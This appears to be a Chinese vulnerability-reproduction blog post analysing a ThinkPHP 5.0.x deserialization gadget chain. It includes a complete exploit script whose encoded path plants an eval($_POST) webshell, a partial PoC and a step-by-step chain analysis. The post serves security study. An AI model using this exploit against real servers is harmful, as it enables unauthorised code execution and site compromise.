漏洞复现
exp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109
| <?php
namespace think\process\pipes{ class Windows{ private $files=[];
public function __construct($pivot) { $this->files[]=$pivot; } } }
namespace think\model{ class Pivot{ protected $parent; protected $append = []; protected $error;
public function __construct($output,$hasone) { $this->parent=$output; $this->append=['a'=>'getError']; $this->error=$hasone; } } }
namespace think\db{ class Query { protected $model;
public function __construct($output) { $this->model=$output; } } }
namespace think\console{ class Output { private $handle = null; protected $styles; public function __construct($memcached) { $this->handle=$memcached; $this->styles=['getAttr']; } } }
namespace think\model\relation{ class HasOne{ protected $query; protected $selfRelation; protected $bindAttr = [];
public function __construct($query) { $this->query=$query;
$this->selfRelation=false; $this->bindAttr=['a'=>'admin']; } } }
namespace think\session\driver{ class Memcached{ protected $handler = null;
public function __construct($file) { $this->handler=$file; } } }
namespace think\cache\driver{ class File{ protected $options = [ 'path'=> 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php', 'cache_subdir'=>false, 'prefix'=>'', 'data_compress'=>false ]; protected $tag=true;
} }
namespace { $file=new think\cache\driver\File(); $memcached=new think\session\driver\Memcached($file); $output=new think\console\Output($memcached); $query=new think\db\Query($output); $hasone=new think\model\relation\HasOne($query); $pivot=new think\model\Pivot($output,$hasone); $windows=new think\process\pipes\Windows($pivot);
echo urlencode(serialize($windows)); }
|
写入成功
1
| http://localhost/public/a.php3b58a9545013e88c7186db11bb158c44.php
|
data:image/s3,"s3://crabby-images/c55e0/c55e07e7b3bf155b075cc95c8f316ff562e9fe87" alt="fekia4.png"
文件内容
data:image/s3,"s3://crabby-images/f0844/f0844c17bfa37581ce05c0e7eb81483597e3c3f9" alt="fekFIJ.png"
利用链分析
- thinkphp/library/think/process/pipes/Windows.php __destruct 调用removeFiles
- removeFiles,调用file_exists触发__toString
- thinkphp/library/think/Model.php __tostring->toJson->toArray 最终调用
__call
- thinkphp/library/think/console/Output.php __call 调用Output类的block
- thinkphp/library/think/console/Output.php block调用writeIn->write,最后调用$this->handle->write(),全局搜索write方法
- thinkphp/library/think/session/driver/Memcached.php write方法调用$this->handle->set(),全局搜索set
- thinkphp/library/think/cache/driver/File.php set调用file_put_contents写入文件,但是参数不可控,继续进入setTagItem
- setTagItem再次调用set,此时参数可控,写入webshell
1.thinkphp/library/think/process/pipes/Windows.php
起点:__destruct
调用removeFiles方法
data:image/s3,"s3://crabby-images/96d59/96d595e9df43da175fdc23a61d7c74f5f269edbd" alt="feFh8I.png"
2.thinkphp/library/think/process/pipes/Windows.php
removeFiles中调用了file_exists,触发__toString
data:image/s3,"s3://crabby-images/1f759/1f759fc9c1d7123a3b673555b918278048a2649a" alt="feFoKf.png"
3.thinkphp/library/think/Model.php
__toString->toJson->toArray:
执行到$item[$key] = $value ? $value->getAttr($attr) : null;
就能够执行Output类__call
魔术方法
data:image/s3,"s3://crabby-images/09d80/09d807d46a63a9480069af647783b36ea9a8bb30" alt="feF42t.png"
data:image/s3,"s3://crabby-images/1d3a9/1d3a995528ef5ec3617674780592f3147e8b0b26" alt="feF5xP.png"
详细看toArray
执行到$item[$key] = $value ? $value->getAttr($attr) : null;
就能够执行Output类__call
魔术方法
需要让$value等于Output类
需要满足条件进入else分支
- $this->append不为空
- $bindAttr
data:image/s3,"s3://crabby-images/620ac/620ac4533cdb16ef28f63e5f6c0994aed8149f25" alt="feFTr8.png"
$value是包含__call方法的类,也就是Output类,$attr是传入的参数。来看一下$value和$attr的来源
$value变量来源
$value的赋值过程
1 2
| $modelRelation = $this->$relation(); $value = $this->getRelationData($modelRelation);
|
让$relation等于Model类的getError(),这样$modelRelation就等于$this->error,$modelRelation可控
data:image/s3,"s3://crabby-images/8f74a/8f74a149cb7011abfe16a4b08a4d52b137b99263" alt="feFbVg.png"
进入getRelationData,传入的$modelRelation必须是Relation类型,全局搜索找到符合要求的类HasOne
需要满足三个条件进入if分支,才能使$value可控,等于$this->parent
1
| $this->parent && !$modelRelation->isSelfRelation() && get_class($modelRelation->getModel()) == get_class($this->parent)
|
data:image/s3,"s3://crabby-images/e6f20/e6f209bff7b89f80a6e18143498d5ab3cbe3206f" alt="feF7qS.png"
第一个条件:$this->parent就是$value的来源,等于Output类
来看一下如何满足第二个条件
1
| !$modelRelation->isSelfRelation()
|
HasOne类是OneToOne类的子类,同样继承了Relation
/thinkphp/library/think/model/Relation.php
isSelfRelation方法,需要让$this->selfRelation为false
data:image/s3,"s3://crabby-images/55cb0/55cb0d241d48811d027bd0676c2f8a466da20c86" alt="feFXPs.png"
第三个条件,需要让$modelRelation->getModel()返回Output类
1
| get_class($modelRelation->getModel()) == get_class($this->parent)
|
/thinkphp/library/think/model/Relation.php
Relation的getModel方法可以调用任意类的getModel方法,全局搜索getModel()
data:image/s3,"s3://crabby-images/8d7f4/8d7f4982ea3a625185ff8c9a1b9220e154cda15a" alt="feFjGn.png"
/thinkphp/library/think/db/Query.php
Query类的getModel方法直接返回$this->model,让model属性等于output就可以了
data:image/s3,"s3://crabby-images/429ee/429eef887b54cb60697353467df8ecf394cfcf3e" alt="feFv2q.png"
$attr的来源
$modelRelation必须是一个有getBindAttr方法且bindAttr属性可控的类,全局搜索存在getBindAttr方法的类
data:image/s3,"s3://crabby-images/cebe0/cebe0dd591021e91150f998f2b4977108771e775" alt="feFqaQ.png"
/thinkphp/library/think/model/relation/OneToOne.php
找到符合要求的类OneToOne,上面已经用了它的子类HasOne,所以直接改HasOne的bindAttr属性就行
data:image/s3,"s3://crabby-images/8e018/8e01873832c19239fe828222133eff8584278378" alt="feFL5j.png"
先构造部分poc,目的是成功调用到Output类的__call
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82
| <?php
namespace think\process\pipes{ class Windows{ private $files=[];
public function __construct($pivot) { $this->files[]=$pivot; } } }
namespace think\model{ class Pivot{ protected $parent; protected $append = []; protected $error;
public function __construct($output,$hasone) { $this->parent=$output; $this->append=['a'=>'getError']; $this->error=$hasone; } } }
namespace think\db{ class Query { protected $model;
public function __construct($output) { $this->model=$output; } } }
namespace think\console{ class Output { public function __construct() {
} } }
//HasOne类继承自Relation namespace think\model\relation{ class HasOne{ protected $query; protected $selfRelation; protected $bindAttr = [];
public function __construct($query) { $this->query=$query;
$this->selfRelation=false; $this->bindAttr=['a'=>'a']; } } }
namespace { $output=new think\console\Output();
$query=new think\db\Query($output);
$hasone=new think\model\relation\HasOne($query); $pivot=new think\model\Pivot($output,$hasone); $windows=new think\process\pipes\Windows($pivot);
echo urlencode(serialize($windows)); }
|
成功调用了Output类的__call
data:image/s3,"s3://crabby-images/67ebe/67ebedcf454f6a0a3d3a23a1ec4525683e1634c2" alt="fekSMV.png"
4./thinkphp/library/think/console/Output.php
Output类的__call,调用block方法
data:image/s3,"s3://crabby-images/4e798/4e798e83d1a05b4dd4a32632394d9f22d26c26cc" alt="feFyDO.png"
5./thinkphp/library/think/console/Output.php
Output类的block方法调用了writeIn,$message就是HasOne类的属性bindAttr数组的值,是可控的。格式如下
1
| <getAttr>admin</getAttr>
|
data:image/s3,"s3://crabby-images/dd1a6/dd1a69324c9f6124e097f264522de29df771195f" alt="feFsKK.png"
data:image/s3,"s3://crabby-images/e6486/e648610fb1515e5a18a4ac7e93caba6c2ce9adf1" alt="feFxx0.png"
6./thinkphp/library/think/console/Output.php
Output类的writeIn方法调用了write方法,$this->handle可控,可以调用任意类的write方法。全局搜索write方法
data:image/s3,"s3://crabby-images/b2136/b2136971ac173c3d18f3430b9c70a39906b6f5fa" alt="fek9qU.png"
7.thinkphp/library/think/session/driver/Memcached.php
找到Memcached类的write方法,可以调用任意类的set方法,全局搜索set方法
data:image/s3,"s3://crabby-images/b73c3/b73c3705fb5df197522fd14018bb96ddfe4b32e8" alt="fekprT.png"
8.thinkphp/library/think/cache/driver/File.php
最后找到File类,set方法中可以调用file_put_contents方法写入shell。
第一个参数$name是从block方法那里传入的,还是
1
| <getAttr>admin</getAttr>
|
第二个参数$value固定为false
data:image/s3,"s3://crabby-images/6494d/6494d9ebef1b9885ac34fe19bc557e2f0bb2f3a6" alt="feFgVe.png"
文件名$filename来源于getCacheKey,实际上等于
1
| $filename = $this->options['path'] . md5($name) . '.php';
|
也就是
1
| $filename = $this->options['path'] . md5('<getAttr>admin</getAttr>') . '.php';
|
可以通过$this->options[‘path’]控制文件名
data:image/s3,"s3://crabby-images/15d6f/15d6f8aaf4c39f5bdca0e81485dfba7006d73839" alt="feF6bD.png"
还有个问题,文件内容不可控。
$data来自于set方法的参数$value,而$value的值固定为true,而且$expire只能为数值,
data:image/s3,"s3://crabby-images/b9c75/b9c75f755ff0357675cfb19ff7c35ece652ca3a7" alt="feF2UH.png"
9.thinkphp/library/think/cache/driver/File.php
继续执行进入setTagItem,再次调用set,两个参数都可控了
data:image/s3,"s3://crabby-images/cf0f8/cf0f89b281e83908355a966755df7dba39c3ae24" alt="feFR5d.png"
现在第一个参数$name等于
1
| 'tag_' . md5($this->tag);
|
$value就是上面的$filename
1
| $value=php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php63ac11a7699c5c57d85009296440d77a.php
|
利用php://filter的convert.iconv和convret.base64-decode绕过拼接的exit(),写入webshell
原理见:https://xz.aliyun.com/t/7457
data:image/s3,"s3://crabby-images/b056b/b056ba2c68c699dd035d080a6b96b67f2c8b2547" alt="fekPZF.png"
一共会写入两个文件,第一个文件内容不可控,第二个才是webshell
1
| a.php3b58a9545013e88c7186db11bb158c44.php
|
总结
实际测试在5.0.24和5.0.18可用,5.0.9不可用
要点:
- Model类的
__toString
调用Output类的__call
的条件
- 二次调用set实现内容可控
- 用过滤器绕过文件名和exit()
借用文章里的图总结一下
data:image/s3,"s3://crabby-images/bc6ac/bc6acefc88581b2fbe1618dd734a63c1349ca8dc" alt="fekAi9.png"
参考
https://xz.aliyun.com/t/7457
https://www.anquanke.com/post/id/196364
https://xz.aliyun.com/t/7082